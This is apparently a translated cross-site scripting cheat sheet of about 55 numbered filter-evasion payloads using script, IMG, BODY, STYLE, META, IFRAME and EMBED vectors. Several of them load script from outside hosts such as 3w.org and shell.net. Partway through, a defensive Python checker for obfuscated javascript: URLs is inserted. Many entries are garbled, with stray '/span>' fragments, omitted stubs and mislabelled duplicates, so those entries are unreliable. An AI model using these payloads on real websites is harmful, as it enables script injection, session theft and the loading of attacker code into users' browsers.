(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters have basically no effect in China, because there is nowhere to use them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">
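Items (3), (4), (5), (8) to (10), (13), (14), (17) and (19) all disguise the same javascript: scheme with case changes, character references without semicolons, embedded tabs, newlines and nulls, or leading whitespace. The Python check below is added here as an illustration and is not part of the original list: it normalizes an attribute value the way a browser would before reading its scheme, so a server-side filter sees through those variants. The sample values and the function names are constructed for this example, not taken from the page.

```python
import html
import re

# Schemes that execute code when the browser resolves them as a URL.
DANGEROUS_SCHEMES = {"javascript", "vbscript", "data"}

# C0 control characters (NUL, TAB, LF, CR, ...). Browsers drop TAB/LF/CR
# anywhere in a URL and ignore leading controls; removing all of them
# everywhere is a deliberately conservative superset of that behaviour.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f]")


def normalize_url(value: str) -> str:
    """Approximate what a browser does to an attribute value before it
    interprets it as a URL, so that obfuscated schemes become visible."""
    # HTML character references are decoded first; html.unescape follows the
    # HTML5 rules, so &#106 and &#x6A are decoded even without a ';'.
    decoded = html.unescape(value)
    # Then embedded/leading control characters disappear ("jav<TAB>ascript:").
    stripped = _CONTROL_CHARS.sub("", decoded)
    # Finally leading and trailing whitespace is ignored ("  javascript:").
    return stripped.strip()


def url_scheme(value: str) -> str:
    """Return the lower-cased scheme of the normalized URL, or '' if none."""
    match = re.match(r"([a-zA-Z][a-zA-Z0-9+.-]*):", normalize_url(value))
    return match.group(1).lower() if match else ""


def is_dangerous_url(value: str) -> bool:
    """True if the attribute value would resolve to a code-executing scheme."""
    return url_scheme(value) in DANGEROUS_SCHEMES


if __name__ == "__main__":
    # Constructed samples in the spirit of items (3)-(19); not from the page.
    samples = [
        "javascript:alert('XSS')",
        "JaVaScRiPt:alert('XSS')",
        "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
        "jav&#x09;ascript:alert('XSS')",
        "java\x00script:alert('XSS')",
        " &#14;  javascript:alert('XSS')",
        "https://example.com/logo.png",
    ]
    for s in samples:
        print(f"{is_dangerous_url(s)!s:5} {s!r}")
```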
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) Split expression in a STYLE attribute
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>